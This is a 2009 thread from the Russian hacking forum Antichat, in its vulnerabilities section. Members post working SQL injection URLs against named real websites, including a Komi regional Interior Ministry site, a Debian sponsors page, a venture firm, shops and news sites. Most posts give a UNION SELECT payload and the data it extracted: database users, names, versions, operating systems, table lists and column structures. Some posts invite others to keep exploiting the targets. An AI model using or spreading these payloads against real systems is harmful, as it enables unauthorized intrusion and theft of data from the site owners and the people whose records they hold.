ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10731  
Старый 17.09.2009, 23:04
Аватар для ph4nt0m
ph4nt0m
Новичок
Регистрация: 10.08.2009
Сообщений: 11
Провел на форуме:
202027

Репутация: 37
По умолчанию

iem.com Pr4

Количество полей, вывод:
Код:
http://www.iem.com/NewsArticle.php?news_id=-53+union+select+1,2,3,4,5,6,7,8--
далее:

PHP код:
http://www.iem.com/NewsArticle.php?news_id=-53+union+select+1,2,3,4,USER(),DATABASE(),7,8-- 
Цитата:
root@localhost
iemcorp
ось:
OS : Windows NT VMWEBSRV 6.0 build 6001
Server : Microsoft-IIS/7.0
User : IUSR
pwd : C:\inetpub\wwwroot

Последний раз редактировалось jokester; 17.09.2009 в 23:27..
 
Ответить с цитированием

  #10732  
Старый 18.09.2009, 00:13
Аватар для hackmon
hackmon
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме:
362547

Репутация: 93
По умолчанию

Код:
http://www.caddealer.com/greenit/news.php?id=-1+union+select+1,2,3,4,5,6,7--
версия
Код:
5.0.45
 
Ответить с цитированием

  #10733  
Старый 18.09.2009, 01:10
Аватар для IgAlex
IgAlex
Познающий
Регистрация: 17.11.2008
Сообщений: 48
Провел на форуме:
351316

Репутация: 71
По умолчанию

www.rakebacknetwork.com
Код:
http://www.rakebacknetwork.com/featuredsites.php?id=-1%20union%20all%20select%201,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
4.1.20-community-nt:rakebacknetwork:rakebacknetwork@localhost
 
Ответить с цитированием

  #10734  
Старый 18.09.2009, 08:59
Аватар для it's my
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию

заказывал сигары, и чот решил посмотреть короче шоп сигар, крутите кому надо
Код:
http://www.bestcigars.ru/shop.php?typeid=1&subtypeid=2&brandid=-1+union+select+1,concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+limit+215,1+--+

Последний раз редактировалось jokester; 18.09.2009 в 14:44.. Причина: domsigar.ru БОЯН. А то, что в другом скрипте, по***. Та скуль работает до сих пор. Может ты все сайты тут на другие скриты пересмотришь?
 
Ответить с цитированием

  #10735  
Старый 18.09.2009, 10:02
Аватар для hackmon
hackmon
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме:
362547

Репутация: 93
По умолчанию

Код:
http://www.brokenpencil.com/deathmatch/2008/view.php?id=2 +union+select+1,2,3,4--
database brokenpe
 
Ответить с цитированием

  #10736  
Старый 18.09.2009, 13:53
Аватар для Shadrin
Shadrin
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171

Репутация: 270
Отправить сообщение для Shadrin с помощью ICQ
По умолчанию

pr5
ponte_barca@localhost : ponte_barca : 4.1.22
Код:
http://www.pontedabarca.com.pt/destaque.php?id=-183+UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7--

it's my за свои деньги еще и травиться,раньше паровозил,щас не жалею что бросил.
Цитата:
Сообщение от it's my  
<BlackSun>: домсигары - боян.
странно что за 2 года дыру так и не залепили

Последний раз редактировалось Shadrin; 18.09.2009 в 13:56..
 
Ответить с цитированием

  #10737  
Старый 18.09.2009, 17:52
Аватар для L I G A
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию

МВД [Министерство внутренних дел]


Код:
http://www.mvd.rkomi.ru/indexnews.php?id=-186+union+select+1,2,3,4,5,6,7+--
Код:
http://www.mvd.rkomi.ru/indexnews.php?id=-186+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7+--
version:5.0.51a
db:mvd
user:mvd@localhost
OS:suse-linux-gnu

Tables:
Код:
http://www.mvd.rkomi.ru/indexnews.php?id=-186+union+select+1,2,3,4,table_name,6,7+from+information_schema.tables+--
anons
datamvd
gibdd
info
mail
memorial
news
orientirovki
pamiatki
rozisk
service
yhastk
yvdovd


Код:
http://www.mvd.rkomi.ru/indexnews.php?id=-186+union+select+1,2,3,4,COLUMN_NAME,6,7+from+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='mail'+--
Structure of several tables

->mail:
Код:
+--------------------+
|id | service | email|
+--------------------+

->yhastk :
Код:
+-----------------------------------------------+
|id | name | email | tel | flag | raion | region|
+-----------------------------------------------+
->service:
Код:
+--------------------------+
|id | title | text |priznak|
+--------------------------+
->datamvd:
Код:
+-----------------------------------------------+
|id | name | path | prikaz | id1 | data | razmer|
+-----------------------------------------------+
->info:
Код:
+---------------------------+
|id | text | priznak | title|
+---------------------------+

//that's all

 
Ответить с цитированием

  #10738  
Старый 18.09.2009, 19:39
Аватар для Dyxxx
Dyxxx
Участник форума
Регистрация: 16.02.2009
Сообщений: 191
Провел на форуме:
879928

Репутация: 438
По умолчанию

accel.com pr7
Сообщество буржуй-предпринимателей
Код:
http://www.accel.com/news/news_one_up.php?news_id=null'+union+all+select+null,null,null,concat_ws(0x2f,0x3C7363726970743E616C6572742827,version(),user(),database(),0x27293C2F7363726970743E),null+--+
Второй сервер:
http://careers.accel.com/jobdetail.php?jobid=27063+and+substring(version(),1,1)=5
5.0.84-rs/accel_outty@localhost/Web_Admin_Live
второй серв 5 мускул, юзер 5vlmysqluser


ps/ всё в дырках
 
Ответить с цитированием

  #10739  
Старый 18.09.2009, 20:18
Аватар для Skofield
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

PR 6
Код:
http://www.planetfriendly.net/volunteer/vld.php?id=-7669+union+select+version(),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77/*
Database Version: 4.1.18
Database name: db376790
User name: db376790@localhost

--------------------------------------------------------------------------------------------------

Код:
http://www.grosnor.com/main.news.php?NID=-541+union+select+1,unhex(hex(version())),3,4,5,6,7,8,9/*
 
Ответить с цитированием

  #10740  
Старый 19.09.2009, 08:22
Аватар для xena-mil1
xena-mil1
Познающий
Регистрация: 17.10.2006
Сообщений: 83
Провел на форуме:
552846

Репутация: 55
По умолчанию

DEBIAN !
http://sponsors.debian.net/viewpkg.php?id=9%20union%20select%201,database(),v ersion(),user(),5,6,7,8,9,10,11

5.0.51a-24+lenny1-log
maulkin@localhost
debian-sponsors
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ